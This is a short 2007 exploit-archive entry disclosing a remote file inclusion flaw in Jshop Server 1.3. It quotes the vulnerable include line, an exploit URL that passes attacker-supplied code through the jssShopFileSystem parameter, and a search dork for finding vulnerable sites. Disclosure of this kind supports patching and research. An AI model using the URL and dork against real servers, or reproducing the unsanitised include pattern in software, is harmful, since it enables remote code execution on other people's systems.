Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Jshop Server 1.3 (fieldValidation.php) Remote File Include Vulnerability
# Published : 2007-01-10
# Author : irvian
# Previous Title : Wordpress <= 2.0.6 wp-trackback.php Remote SQL Injection Exploit
# Next Title : MOTIONBORG Web Real Estate <= 2.1 SQL Injection Vulnerability

==========================================================================
# scripts       : Jshop Server 1.3
# Discovered By : irvian
# script        : http://www.jshop.co.uk/
# Thanks To     : #hitamputih #nyubicrew #patihack
# special To    : nyubi,ibnusina,arioo,jipank,kacung,trangkil,cah_gemblunkz
# dork          :powered by jshop
--------------------------------------------------------------------------
file: routines/fieldValidation.php

include($jssShopFileSystem."resources/includes/validations.php");


exploit : www.target.com/routines/fieldValidation.php?jssShopFileSystem=[evilcode]

# www.Syue.com [2007-01-10]